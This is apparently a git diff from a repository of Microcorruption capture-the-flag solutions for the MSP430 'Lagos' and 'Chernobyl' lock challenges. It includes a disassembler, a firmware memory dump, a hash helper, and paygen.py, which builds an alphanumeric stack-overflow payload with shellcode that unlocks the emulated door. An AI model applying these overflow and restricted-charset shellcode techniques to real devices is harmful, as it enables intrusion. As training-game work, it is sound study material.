finalins = 'ret' if finalins == 'mov @sp+, pc' else finalins
|
||||||
|
|
||||||
|
#Status register twiddling
|
||||||
|
finalins = 'clrc' if finalins == 'bic #1, sr' else finalins
|
||||||
|
finalins = 'setc' if finalins == 'bis #1, sr' else finalins
|
||||||
|
finalins = 'clrz' if finalins == 'bic #2, sr' else finalins
|
||||||
|
finalins = 'setz' if finalins == 'bis #2, sr' else finalins
|
||||||
|
finalins = 'clrn' if finalins == 'bic #4, sr' else finalins
|
||||||
|
finalins = 'setn' if finalins == 'bis #4, sr' else finalins
|
||||||
|
finalins = 'dint' if finalins == 'bic #8, sr' else finalins
|
||||||
|
finalins = 'eint' if finalins == 'bic #8, sr' else finalins
|
||||||
|
#nop = mov dst, dst
|
||||||
|
finalins = 'nop' if opcode == 'mov' and reg_output_src == reg_output_dst else finalins
|
||||||
|
|
||||||
|
#These ones require a small amount of effort because it uses any register.
|
||||||
|
#All of these are one-operand instructions, so if we need to reassemble
|
||||||
|
#the instruction, it'll simply follow the one-operand format.
|
||||||
|
|
||||||
|
reassembleins = True
|
||||||
|
uses_dest = True
|
||||||
|
|
||||||
|
#Branch. Requires a little bit of extra sanity checking
|
||||||
|
#because it could get mistaken for ret
|
||||||
|
if opcode == 'mov' and reg_output_dst == 'pc' and finalins != 'ret': #br = mov src, pc
|
||||||
|
opcode = 'br'
|
||||||
|
uses_dest = False #We're actually using src here
|
||||||
|
|
||||||
|
#Pop. Could also get mistaken for ret.
|
||||||
|
elif opcode == 'mov' and reg_output_src == '@sp+' and finalins != 'ret': #pop = mov @sp+, dst
|
||||||
|
opcode = 'pop'
|
||||||
|
|
||||||
|
#Shift and rotate left
|
||||||
|
|
||||||
|
elif opcode == 'add' and srcReg == dstReg: #rla = add dst, dst
|
||||||
|
opcode = 'rla'
|
||||||
|
elif opcode == 'addc' and srcReg == dstReg: #rlc = addc dst, dst
|
||||||
|
opcode = 'rlc'
|
||||||
|
|
||||||
|
#Common one-operand instructions
|
||||||
|
|
||||||
|
elif opcode == 'xor' and reg_output_src == '#0xffff {-1}': #inv = xor 0xffff, dst
|
||||||
|
opcode = 'inv'
|
||||||
|
#Extra sanity checking to prevent being mistaken for nop
|
||||||
|
elif opcode == 'mov' and reg_output_src == '#0' and reg_output_dst != '#0': #clr = mov #0, dst
|
||||||
|
opcode = 'clr'
|
||||||
|
elif opcode == 'cmp' and reg_output_src == '#0': #tst = cmp #0, dst
|
||||||
|
opcode = 'tst'
|
||||||
|
|
||||||
|
|
||||||
|
#Increment and decrement (by one or two)
|
||||||
|
|
||||||
|
elif opcode == 'sub' and reg_output_src == '#1': #dec = sub #1, dst
|
||||||
|
opcode = 'dec'
|
||||||
|
elif opcode == 'sub' and reg_output_src == '#2': #decd = sub #2, dst
|
||||||
|
opcode = 'decd'
|
||||||
|
elif opcode == 'add' and reg_output_src == '#1': #inc = add #1, dst
|
||||||
|
opcode = 'inc'
|
||||||
|
elif opcode == 'add' and reg_output_src == '#2': #incd = add #1, dst
|
||||||
|
opcode = 'incd'
|
||||||
|
|
||||||
|
#Add and subtract only the carry bit:
|
||||||
|
|
||||||
|
elif opcode == 'addc' and reg_output_src == '#0': #adc = addc #0, dst
|
||||||
|
opcode = 'adc'
|
||||||
|
elif opcode == 'dadd' and reg_output_src == '#0': #dadc = dadd #0, dst
|
||||||
|
opcode = 'dadc'
|
||||||
|
elif opcode == 'subc' and reg_output_src == '#0': #sbc = subc #0, dst
|
||||||
|
opcode = 'sbc'
|
||||||
|
|
||||||
|
#The instruction is not an emulated instruction
|
||||||
|
else:
|
||||||
|
reassembleins = False
|
||||||
|
|
||||||
|
if reassembleins:
|
||||||
|
finalins = opcode + bytemode + ' ' + (reg_output_dst if uses_dest else reg_output_src)
|
||||||
|
|
||||||
|
return finalins
|
||||||
|
|
||||||
|
|
||||||
|
adr_modes = ['{register}', '{index}({register})', '@{register}', '@{register}+']
|
||||||
|
|
||||||
|
def disassemble_addressing_mode(reg, adrmode):
|
||||||
|
"""Outputs disassembly of a register's addressing mode and whether an extension
|
||||||
|
word was used (to update PC accordingly in the calling function),
|
||||||
|
given the register number and addressing mode number."""
|
||||||
|
|
||||||
|
#http://mspgcc.sourceforge.net/manual/x147.html
|
||||||
|
|
||||||
|
extensionWord = False
|
||||||
|
#print(f"{PC = :x}, {asm = }", end="");
|
||||||
|
|
||||||
|
#r2 (status register) and r3 (CG) are encoded as constant registers
|
||||||
|
if reg == 2:
|
||||||
|
if adrmode == 0: #Normal access
|
||||||
|
reg_output = adr_modes[adrmode].format(register=register_names[reg])
|
||||||
|
elif adrmode == 1: #Absolute address using extension word
|
||||||
|
reg_output = '&' + hex(asm[PC + 1]) #Get next word
|
||||||
|
extensionWord = True
|
||||||
|
elif adrmode == 2:
|
||||||
|
reg_output = '#4'
|
||||||
|
elif adrmode == 3:
|
||||||
|
reg_output = '#8'
|
||||||
|
|
||||||
|
elif reg == 3:
|
||||||
|
if adrmode == 0:
|
||||||
|
reg_output = '#0'
|
||||||
|
elif adrmode == 1:
|
||||||
|
reg_output = '#1'
|
||||||
|
elif adrmode == 2:
|
||||||
|
reg_output = '#2'
|
||||||
|
elif adrmode == 3:
|
||||||
|
#Just a little reminder that all bits set == -1
|
||||||
|
reg_output = '#0xffff {-1}'
|
||||||
|
|
||||||
|
elif adrmode == 0:
|
||||||
|
reg_output = adr_modes[adrmode].format(register=register_names[reg])
|
||||||
|
|
||||||
|
elif adrmode == 1:
|
||||||
|
reg_output = adr_modes[adrmode].format(register=register_names[reg], index=hex(asm[PC + 1]))
|
||||||
|
extensionWord = True
|
||||||
|
|
||||||
|
elif adrmode == 2:
|
||||||
|
reg_output = adr_modes[adrmode].format(register=register_names[reg])
|
||||||
|
|
||||||
|
elif adrmode == 3 and reg == 0: #PC was incremented for a constant
|
||||||
|
reg_output = '#' + hex(asm[PC + 1])
|
||||||
|
extensionWord = True
|
||||||
|
|
||||||
|
elif adrmode == 3:
|
||||||
|
reg_output = adr_modes[adrmode].format(register=register_names[reg])
|
||||||
|
|
||||||
|
return (reg_output, extensionWord)
|
62
16 - Lagos/generate_lut.py
Normal file
62
16 - Lagos/generate_lut.py
Normal file
@ -0,0 +1,62 @@
|
|||||||
|
import string
|
||||||
|
from string import printable
|
||||||
|
from math import ceil, floor
|
||||||
|
|
||||||
|
valid = 0
|
||||||
|
valid_chars = (string.digits + string.ascii_uppercase + string.ascii_lowercase).encode()
|
||||||
|
|
||||||
|
def u16(i:int):
|
||||||
|
return i & 0xffff
|
||||||
|
|
||||||
|
def half_pair(i: int) -> list:
|
||||||
|
i = u16(i)
|
||||||
|
return [floor(i/2), ceil(i/2)]
|
||||||
|
|
||||||
|
def neg_half_pair(i: int) -> list:
|
||||||
|
# 2's c negate i
|
||||||
|
i = 0x10000 - u16(i)
|
||||||
|
return half_pair(i)
|
||||||
|
|
||||||
|
def not_in_set(set, start: int = 0x0, end: int = 0xff):
|
||||||
|
for char in range(start, end+1):
|
||||||
|
if char not in set:
|
||||||
|
print(F"{char:02x}[{chr(char)}]", end=" ")
|
||||||
|
|
||||||
|
|
||||||
|
def isprintable(char: int):
|
||||||
|
return f'{chr(char)}' if char > 0x30 and chr(char) in printable else "."
|
||||||
|
|
||||||
|
# for solution in sorted(solutions):
|
||||||
|
# print(f"{solution:02x} '{isprintable(solution)}'= {solutions[solution]}")
|
||||||
|
|
||||||
|
def bfs(start, end, characters = valid_chars): #function for BFS
|
||||||
|
solutions = {}
|
||||||
|
queue = []
|
||||||
|
# Populate solutions with trivial solutions, and queue with the same
|
||||||
|
for character in characters:
|
||||||
|
solutions[character] = f'{character:x}';
|
||||||
|
queue.append(character)
|
||||||
|
# loop until the queue is empty, and every reachable number has been found
|
||||||
|
while queue:
|
||||||
|
current = queue.pop(0)
|
||||||
|
for neighbor in characters:
|
||||||
|
for operator, operation in [['+', int.__add__], ['-', int.__sub__]]:
|
||||||
|
new = operation(current, neighbor)
|
||||||
|
if new in solutions: continue
|
||||||
|
if new in range(start, end+1):
|
||||||
|
solutions[new] = f"{solutions[current]} {operator} {neighbor:x}"
|
||||||
|
queue.append(new)
|
||||||
|
return solutions
|
||||||
|
|
||||||
|
super_valid_chars:bytes = []
|
||||||
|
for one in valid_chars:
|
||||||
|
for two in valid_chars:
|
||||||
|
super_valid_chars.append (int.from_bytes(one.to_bytes(1, 'big') + two.to_bytes(1, 'big'), 'big'))
|
||||||
|
|
||||||
|
|
||||||
|
solutions = bfs(0, 0xffff, super_valid_chars)
|
||||||
|
for solution in sorted(solutions):
|
||||||
|
bas = solution.to_bytes(2, 'big')
|
||||||
|
print(f"{solution:04x} '{isprintable(bas[0])}{isprintable(bas[1])}'= {solutions[solution]}")
|
||||||
|
|
||||||
|
exit()
|
20
16 - Lagos/insgen.py
Normal file
20
16 - Lagos/insgen.py
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
import string
|
||||||
|
import disassemble
|
||||||
|
from disassemble import disassemble, dis_bytes
|
||||||
|
# Instruction
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
valid_chars = string.digits + string.ascii_uppercase + string.ascii_lowercase
|
||||||
|
char = [0, 0]
|
||||||
|
for char[0] in valid_chars:
|
||||||
|
for char[1] in valid_chars:
|
||||||
|
word=(char[0]+char[1]).encode('ascii')
|
||||||
|
|
||||||
|
print(f"__{word[0]:x}{word[1]:x}_{word.decode('ascii')}AABB: {dis_bytes(word+ b'AABB')}")
|
||||||
|
# for dis in res:
|
||||||
|
# print()
|
||||||
|
# return 0
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
BIN
16 - Lagos/instructions.asm
Normal file
BIN
16 - Lagos/instructions.asm
Normal file
Binary file not shown.
65536
16 - Lagos/lut.txt
Normal file
65536
16 - Lagos/lut.txt
Normal file
File diff suppressed because it is too large
Load Diff
65536
16 - Lagos/lut2.txt
Normal file
65536
16 - Lagos/lut2.txt
Normal file
File diff suppressed because it is too large
Load Diff
BIN
16 - Lagos/memory_clean.bin
Normal file
BIN
16 - Lagos/memory_clean.bin
Normal file
Binary file not shown.
63
16 - Lagos/memory_clean.txt
Normal file
63
16 - Lagos/memory_clean.txt
Normal file
@ -0,0 +1,63 @@
|
|||||||
|
|
||||||
|
0000: 0000 4400 0000 0000 0000 0000 0000 0000 ..D.............
|
||||||
|
0010: 3041 0000 0000 0000 0000 0000 0000 0000 0A..............
|
||||||
|
0020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
|
||||||
|
0030: *
|
||||||
|
4400: 3140 0044 1542 5c01 75f3 35d0 085a 3f40 1@.D.B\.u.5..Z?@
|
||||||
|
4410: 0000 0f93 0724 8245 5c01 2f83 9f4f f446 .....$.E\./..O.F
|
||||||
|
4420: 0024 f923 3f40 0102 0f93 0624 8245 5c01 .$.#?@.....$.E\.
|
||||||
|
4430: 1f83 cf43 0024 fa23 b012 5e45 32d0 f000 ...C.$.#..^E2...
|
||||||
|
4440: fd3f 3040 f246 0412 0441 2453 2183 c443 .?0@.F...A$S!..C
|
||||||
|
4450: fcff 3e40 fcff 0e54 0e12 0f12 3012 7e00 ..>@...T....0.~.
|
||||||
|
4460: b012 fc45 5f44 fcff 8f11 3152 3441 3041 ...E_D....1R4A0A
|
||||||
|
4470: 456e 7465 7220 7468 6520 7061 7373 776f Enter the passwo
|
||||||
|
4480: 7264 2074 6f20 636f 6e74 696e 7565 2e00 rd to continue..
|
||||||
|
4490: 5265 6d65 6d62 6572 3a20 7061 7373 776f Remember: passwo
|
||||||
|
44a0: 7264 7320 6172 6520 6265 7477 6565 6e20 rds are between
|
||||||
|
44b0: 3820 616e 6420 3136 2063 6861 7261 6374 8 and 16 charact
|
||||||
|
44c0: 6572 732e 0044 7565 2074 6f20 736f 6d65 ers..Due to some
|
||||||
|
44d0: 2075 7365 7273 2061 6275 7369 6e67 206f users abusing o
|
||||||
|
44e0: 7572 206c 6f67 696e 2073 7973 7465 6d2c ur login system,
|
||||||
|
44f0: 2077 6520 6861 7665 0072 6573 7472 6963 we have.restric
|
||||||
|
4500: 7465 6420 7061 7373 776f 7264 7320 746f ted passwords to
|
||||||
|
4510: 206f 6e6c 7920 616c 7068 616e 756d 6572 only alphanumer
|
||||||
|
4520: 6963 2063 6861 7261 6374 6572 732e 0041 ic characters..A
|
||||||
|
4530: 6363 6573 7320 6772 616e 7465 642e 0054 ccess granted..T
|
||||||
|
4540: 6861 7420 7061 7373 776f 7264 2069 7320 hat password is
|
||||||
|
4550: 6e6f 7420 636f 7272 6563 742e 0000 0b12 not correct.....
|
||||||
|
4560: 3150 f0ff 3f40 7044 b012 6046 3f40 9044 1P..?@pD..`F?@.D
|
||||||
|
4570: b012 6046 3f40 c544 b012 6046 3f40 f944 ..`F?@.D..`F?@.D
|
||||||
|
4580: b012 6046 3e40 0002 3f40 0024 b012 5046 ..`F>@..?@.$..PF
|
||||||
|
4590: 5f42 0024 0e43 7c40 0900 7d40 1900 073c _B.$.C|@..}@...<
|
||||||
|
45a0: 0b41 0b5e cb4f 0000 5f4e 0024 1e53 4b4f .A.^.O.._N.$.SKO
|
||||||
|
45b0: 7b50 d0ff 4c9b f42f 7b50 efff 4d9b f02f {P..L../{P..M../
|
||||||
|
45c0: 7b50 e0ff 4d9b ec2f c143 0000 3d40 0002 {P..M../.C..=@..
|
||||||
|
45d0: 0e43 3f40 0024 b012 8c46 0f41 b012 4644 .C?@.$...F.A..FD
|
||||||
|
45e0: 0f93 0324 3f40 2f45 023c 3f40 3f45 b012 ...$?@/E.<?@?E..
|
||||||
|
45f0: 6046 3150 1000 3b41 3041 3041 1e41 0200 `F1P..;A0A0A.A..
|
||||||
|
4600: 0212 0f4e 8f10 024f 32d0 0080 b012 1000 ...N...O2.......
|
||||||
|
4610: 3241 3041 2183 0f12 0312 814f 0400 b012 2A0A!......O....
|
||||||
|
4620: fc45 1f41 0400 3150 0600 3041 0412 0441 .E.A..1P..0A...A
|
||||||
|
4630: 2453 2183 3f40 fcff 0f54 0f12 1312 b012 $S!.?@...T......
|
||||||
|
4640: fc45 5f44 fcff 8f11 3150 0600 3441 3041 .E_D....1P..4A0A
|
||||||
|
4650: 0e12 0f12 2312 b012 fc45 3150 0600 3041 ....#....E1P..0A
|
||||||
|
4660: 0b12 0b4f 073c 1b53 8f11 0f12 0312 b012 ...O.<.S........
|
||||||
|
4670: fc45 2152 6f4b 4f93 f623 3012 0a00 0312 .E!RoKO..#0.....
|
||||||
|
4680: b012 fc45 2152 0f43 3b41 3041 0b12 0a12 ...E!R.C;A0A....
|
||||||
|
4690: 0912 0812 0b4f 3d90 0600 082c 043c cb4e .....O=....,.<.N
|
||||||
|
46a0: 0000 1b53 3d53 0d93 fa23 1e3c 4a4e 0a93 ...S=S...#.<JN..
|
||||||
|
46b0: 0324 0c4a 8c10 0adc 1fb3 0524 3d53 cf4e .$.J.......$=S.N
|
||||||
|
46c0: 0000 0b4f 1b53 0c4d 12c3 0c10 084b 094c ...O.S.M.....K.L
|
||||||
|
46d0: 884a 0000 2853 3953 fb23 0c5c 0c5b 1df3 .J..(S9S.#.\.[..
|
||||||
|
46e0: 0d99 0224 cc4e 0000 3841 3941 3a41 3b41 ...$.N..8A9A:A;A
|
||||||
|
46f0: 3041 0013 0000 0000 0000 0000 0000 0000 0A..............
|
||||||
|
4700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
|
||||||
|
4710: *
|
||||||
|
ff80: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ff90: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ffa0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ffb0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ffc0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ffd0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
ffe0: 4244 4244 4244 4244 4244 4244 4244 4244 BDBDBDBDBDBDBDBD
|
||||||
|
fff0: 4244 4244 4244 4244 4244 4244 4244 0044 BDBDBDBDBDBDBD.D
|
58
16 - Lagos/paygen.py
Normal file
58
16 - Lagos/paygen.py
Normal file
@ -0,0 +1,58 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
from math import ceil, floor
|
||||||
|
import string
|
||||||
|
|
||||||
|
# Truncation
|
||||||
|
def u16(i:int):
|
||||||
|
return i & 0xffff
|
||||||
|
# Conversion
|
||||||
|
def stob(s: str):
|
||||||
|
return s.encode('ascii', "replace")
|
||||||
|
def btos(b: bytes):
|
||||||
|
return b.decode('ascii', "replace")
|
||||||
|
def btoi(b: bytes):
|
||||||
|
return int.from_bytes(b, 'little')
|
||||||
|
def itob(i: int):
|
||||||
|
return u16(i).to_bytes(2, 'little', signed=u16(i) < 0x8000);
|
||||||
|
|
||||||
|
'''
|
||||||
|
.text 0x4444
|
||||||
|
setup:
|
||||||
|
add #0x674a, sp ; sub #0x1e6e, sp
|
||||||
|
add #0x7a7a, sp ; sub #0x1e6e, sp
|
||||||
|
ret ; j #25c0
|
||||||
|
'''
|
||||||
|
setup_loadaddr = b'4444'
|
||||||
|
setup = b'31504e6731507a7a3041'
|
||||||
|
|
||||||
|
'''
|
||||||
|
.text 0x25c0
|
||||||
|
unlock:
|
||||||
|
mov #0xff00, sr
|
||||||
|
call #0010
|
||||||
|
'''
|
||||||
|
unlock_loadaddr = 0x25c0
|
||||||
|
unlock = b'324000ffb0121000'
|
||||||
|
|
||||||
|
# ret -> #25c0
|
||||||
|
fake_stack = b'c025'
|
||||||
|
|
||||||
|
raddr_position = 0xf
|
||||||
|
setup_position = 0x057
|
||||||
|
fake_stack_position = 0x1b6 # The loop must continue
|
||||||
|
exploit_position = 0x1c0
|
||||||
|
|
||||||
|
payloadbuffer = b'30' * 15
|
||||||
|
payloadbuffer = setup_loadaddr*16
|
||||||
|
payloadbuffer += b'30' * (setup_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += setup
|
||||||
|
payloadbuffer += b'30' * (fake_stack_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += fake_stack
|
||||||
|
payloadbuffer += b'30' * (exploit_position - len(payloadbuffer)//2)
|
||||||
|
payloadbuffer += unlock
|
||||||
|
|
||||||
|
print(payloadbuffer)
|
||||||
|
|
||||||
|
'''
|
||||||
|
444444444444444444444444444444444444444444444444444444444444444430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030
|
||||||
|
'''
|
96
17 - Chernobyl/.clang-format
Normal file
96
17 - Chernobyl/.clang-format
Normal file
@ -0,0 +1,96 @@
|
|||||||
|
|
||||||
|
# Default to Google style
|
||||||
|
BasedOnStyle: Google
|
||||||
|
|
||||||
|
# Don't derive from file
|
||||||
|
DeriveLineEnding: false
|
||||||
|
DerivePointerAlignment: false
|
||||||
|
|
||||||
|
# Google limits lines to 80 columns. Don't do that.
|
||||||
|
ColumnLimit: 0
|
||||||
|
|
||||||
|
# Here there be controversy
|
||||||
|
IndentWidth: 3
|
||||||
|
ConstructorInitializerIndentWidth: 3
|
||||||
|
ContinuationIndentWidth: 3
|
||||||
|
|
||||||
|
# Alignment checks
|
||||||
|
AlignConsecutiveAssignments: true
|
||||||
|
AlignTrailingComments: true
|
||||||
|
|
||||||
|
# Sort include blocks, and regroup based on include category
|
||||||
|
SortIncludes: CaseInsensitive
|
||||||
|
IncludeBlocks: Regroup
|
||||||
|
|
||||||
|
# Allow short blocks on single line
|
||||||
|
AllowShortBlocksOnASingleLine: Always
|
||||||
|
AllowShortEnumsOnASingleLine: true
|
||||||
|
AllowShortFunctionsOnASingleLine: Inline
|
||||||
|
AllowShortIfStatementsOnASingleLine: AllIfsAndElse
|
||||||
|
AllowShortLambdasOnASingleLine: Inline
|
||||||
|
AllowShortLoopsOnASingleLine: true
|
||||||
|
# Except case statements
|
||||||
|
AllowShortCaseLabelsOnASingleLine: false
|
||||||
|
|
||||||
|
# Line wrapping should not happen, but just in case, keep the args together
|
||||||
|
BinPackArguments: true
|
||||||
|
BinPackParameters: true
|
||||||
|
|
||||||
|
# When bitfield-packing a struct, spaces go after the colon, not before
|
||||||
|
BitFieldColonSpacing: After
|
||||||
|
|
||||||
|
# By default, braces are obnoxiously wrapped to newlines
|
||||||
|
BreakBeforeBraces: Custom
|
||||||
|
# Disable that
|
||||||
|
BraceWrapping:
|
||||||
|
AfterEnum: false
|
||||||
|
AfterFunction: false
|
||||||
|
AfterNamespace: false
|
||||||
|
AfterStruct: false
|
||||||
|
AfterUnion: false
|
||||||
|
AfterExternBlock: false
|
||||||
|
AfterControlStatement: false
|
||||||
|
|
||||||
|
BeforeCatch: false
|
||||||
|
BeforeElse: false
|
||||||
|
BeforeLambdaBody: false
|
||||||
|
BeforeWhile: false
|
||||||
|
|
||||||
|
IndentBraces: false
|
||||||
|
|
||||||
|
SplitEmptyFunction: false
|
||||||
|
|
||||||
|
# Don't break before ?:, it looks ugly
|
||||||
|
BreakBeforeTernaryOperators: false
|
||||||
|
|
||||||
|
# Trim empty lines when there are more than 1
|
||||||
|
MaxEmptyLinesToKeep: 1
|
||||||
|
|
||||||
|
# Align &*s toward the variable name (i.e. int &number; char *cstring)
|
||||||
|
ReferenceAlignment: Pointer
|
||||||
|
PointerAlignment: Right
|
||||||
|
|
||||||
|
# Put spaces after (int) c_style_casts and template <T>, but !after '!' operator
|
||||||
|
SpaceAfterCStyleCast: true
|
||||||
|
SpaceAfterLogicalNot: false
|
||||||
|
SpaceAfterTemplateKeyword: true
|
||||||
|
|
||||||
|
# Put spaces before \.?\= operators, initializer {lists}, inline (parentheses), // comments.
|
||||||
|
SpaceBeforeAssignmentOperators: true
|
||||||
|
SpaceBeforeCpp11BracedList: true
|
||||||
|
SpaceBeforeParens: Always
|
||||||
|
SpacesBeforeTrailingComments: 1
|
||||||
|
SpacesInLineCommentPrefix:
|
||||||
|
Minimum: 1
|
||||||
|
# Don't put spaces in case : statements, object : inheritance,
|
||||||
|
# for (auto& loops : range), conditional ( statements ), ( parentheses ), [ brackets ]
|
||||||
|
SpaceBeforeCaseColon: false
|
||||||
|
SpaceBeforeInheritanceColon: false
|
||||||
|
SpaceBeforeRangeBasedForLoopColon: false
|
||||||
|
SpacesInConditionalStatement: false
|
||||||
|
SpacesInParentheses: false
|
||||||
|
SpacesInSquareBrackets: false
|
||||||
|
|
||||||
|
# Always use LF for line breaks, and NEVER use tabs for indentation
|
||||||
|
UseCRLF: false
|
||||||
|
UseTab: Never
|
BIN
17 - Chernobyl/CFG/Chernobyl_run.png
Normal file
BIN
17 - Chernobyl/CFG/Chernobyl_run.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 416 KiB |
1
17 - Chernobyl/CFG/Chernobyl_run.svg
Normal file
1
17 - Chernobyl/CFG/Chernobyl_run.svg
Normal file
File diff suppressed because one or more lines are too long
After Width: | Height: | Size: 492 KiB |
59
17 - Chernobyl/Code/Makefile
Normal file
59
17 - Chernobyl/Code/Makefile
Normal file
@ -0,0 +1,59 @@
|
|||||||
|
|
||||||
|
# ---------- Variables listed below --------- #
|
||||||
|
# Executable
|
||||||
|
TARGET := chernobyl.out
|
||||||
|
|
||||||
|
# Paths to source, include, dependency, and object files
|
||||||
|
SPATH = src
|
||||||
|
IPATH = inc
|
||||||
|
DPATH = dep
|
||||||
|
OPATH = obj
|
||||||
|
|
||||||
|
# File type of source file
|
||||||
|
STYPE = c
|
||||||
|
|
||||||
|
VPATH = $(SPATH) $(IPATH) $(DPATH) $(OPATH)
|
||||||
|
|
||||||
|
# compiler and compiler flags
|
||||||
|
CC = g++
|
||||||
|
CFLAGS = -I$(IPATH) -std=c++11 -Os
|
||||||
|
|
||||||
|
# list of object files
|
||||||
|
SOURCES = $(wildcard $(SPATH)/*.$(STYPE))
|
||||||
|
OBJECTS = $(addprefix $(OPATH)/,$(notdir $(SOURCES:.$(STYPE)=.o)))
|
||||||
|
|
||||||
|
|
||||||
|
# ----------- Targets listed below ---------- #
|
||||||
|
# Some targets aren't real
|
||||||
|
.PHONY: all clean run dump
|
||||||
|
# Don't autodelete object files:
|
||||||
|
.PRECIOUS: $(OPATH)/%.o
|
||||||
|
|
||||||
|
all: $(DPATH) $(OPATH) $(TARGET)
|
||||||
|
|
||||||
|
dump:
|
||||||
|
@echo SOURCES: $(SOURCES)
|
||||||
|
@echo OBJECTS: $(OBJECTS)
|
||||||
|
@echo TARGET: $(TARGET)
|
||||||
|
@echo VPATH: $(VPATH)
|
||||||
|
|
||||||
|
clean:
|
||||||
|
-rm $(TARGET)
|
||||||
|
-rm -r dep obj
|
||||||
|
|
||||||
|
run:
|
||||||
|
-$(addprefix ./,$(addsuffix ;,$(TARGET)))
|
||||||
|
|
||||||
|
$(DPATH) $(OPATH):
|
||||||
|
mkdir -p $@
|
||||||
|
|
||||||
|
# Make the executable(s)
|
||||||
|
%.out: $(OBJECTS)
|
||||||
|
$(CC) $(CFLAGS) -o "$@" $^
|
||||||
|
# Make the object and dependency files
|
||||||
|
$(OPATH)/%.o: $(SPATH)/%.$(STYPE)
|
||||||
|
$(CC) $(CFLAGS) -MMD -MF "$(DPATH)/$(@F:.o=.d)" -o "$@" -c "$<"
|
||||||
|
|
||||||
|
# --------- Inclusions listed below --------- #
|
||||||
|
# use dependencies when rebuilding
|
||||||
|
-include $(wildcard $(DPATH)/*.d)
|
24
17 - Chernobyl/Code/hashbrek.py
Normal file
24
17 - Chernobyl/Code/hashbrek.py
Normal file
@ -0,0 +1,24 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# TODO: Actually break the hashes?
|
||||||
|
# May not be necessary, just gotta find a way to crash it. Harumph.
|
||||||
|
|
||||||
|
def hash(byts):
|
||||||
|
ret = 0;
|
||||||
|
for c in byts:
|
||||||
|
ret += c
|
||||||
|
ret = ((ret << 5) - ret) & 0xffff
|
||||||
|
return ret
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
line = input("> ")
|
||||||
|
if (line[0] == '~'):
|
||||||
|
h = hash(bytes.fromhex(line[1:]));
|
||||||
|
else:
|
||||||
|
h = hash(line.encode())
|
||||||
|
print(f"hash: {h:x}, box: {h&7:x}");
|
||||||
|
except EOFError:
|
||||||
|
break
|
||||||
|
|
||||||
|
print("")
|
40
17 - Chernobyl/Code/inc/chernobyl.h
Normal file
40
17 - Chernobyl/Code/inc/chernobyl.h
Normal file
@ -0,0 +1,40 @@
|
|||||||
|
#ifndef CHERNOBYL_H
|
||||||
|
#define CHERNOBYL_H
|
||||||
|
|
||||||
|
#include "chernobyl_types.h"
|
||||||
|
|
||||||
|
|
||||||
|
u16 _main ();
|
||||||
|
u16 walk (u16 r15);
|
||||||
|
u16 run ();
|
||||||
|
|
||||||
|
u16 *create_hash_table (u16 r15, u16 r14);
|
||||||
|
u16 add_to_table (u16 r15, u16 r14, u16 r13);
|
||||||
|
// Return address of a buffer from the table
|
||||||
|
// r15 = buffer address. r14
|
||||||
|
u16 get_from_table (void * r15, char * r14);
|
||||||
|
u16 hash (char *str);
|
||||||
|
u16 rehash (u16 r15, u16 r14);
|
||||||
|
|
||||||
|
#define s_4566 "\r\r"
|
||||||
|
#define s_4569 "%x [alloc] [p %x] [n %x] [s %x]"
|
||||||
|
#define s_4588 " "
|
||||||
|
#define s_458b " {%x} [ "
|
||||||
|
#define s_4594 "%x "
|
||||||
|
#define s_4599 "%x [freed] [p %x] [n %x] [s %x]"
|
||||||
|
|
||||||
|
#define s_465e "Heap exhausted; aborting."
|
||||||
|
|
||||||
|
#define s_4a38 "Welcome to the lock controller."
|
||||||
|
#define s_4a58 "You can open the door by entering 'access [your name] [pin]'"
|
||||||
|
#define s_4a95 ""
|
||||||
|
#define s_4a96 "No such box."
|
||||||
|
#define s_4aa3 "Access granted."
|
||||||
|
#define s_4ab3 "Access granted; but account not activated."
|
||||||
|
#define s_4ade "Aceess denied" // [sic]
|
||||||
|
#define s_4aec "Can not have a pin with high bit set."
|
||||||
|
#define s_4b12 "User already has an account."
|
||||||
|
#define s_4b2f "Adding user account %s with pin %x."
|
||||||
|
#define s_4b54 "Invalid command."
|
||||||
|
|
||||||
|
#endif
|
21
17 - Chernobyl/Code/inc/chernobyl_stdlib.h
Normal file
21
17 - Chernobyl/Code/inc/chernobyl_stdlib.h
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
#ifndef CHERNOBYL_STDLIB_H
|
||||||
|
#define CHERNOBYL_STDLIB_H
|
||||||
|
|
||||||
|
#include "chernobyl_types.h"
|
||||||
|
|
||||||
|
// Standard library functions
|
||||||
|
// These use MSPGCC calling convention:
|
||||||
|
// https://www.ti.com/lit/an/slaa664/slaa664.pdf?ts=1659422621072
|
||||||
|
// ( Or see https://nhivp.github.io/msp430-gcc/2018-07-20/function-calling-convention )
|
||||||
|
void *_malloc (u16 size);
|
||||||
|
void _free (void *ptr);
|
||||||
|
u16 _putchar (char c);
|
||||||
|
i16 _getchar ();
|
||||||
|
void _puts (const char *s);
|
||||||
|
void _getsn (char *__restrict buf, u16 length);
|
||||||
|
int _strcmp (const char *s1, const char *s2);
|
||||||
|
void INT (u16 interrupt);
|
||||||
|
|
||||||
|
void swpb (u16 *word);
|
||||||
|
|
||||||
|
#endif
|
32
17 - Chernobyl/Code/inc/chernobyl_types.h
Normal file
32
17 - Chernobyl/Code/inc/chernobyl_types.h
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
#ifndef CHERNOBYL_TYPES_H
|
||||||
|
#define CHERNOBYL_TYPES_H
|
||||||
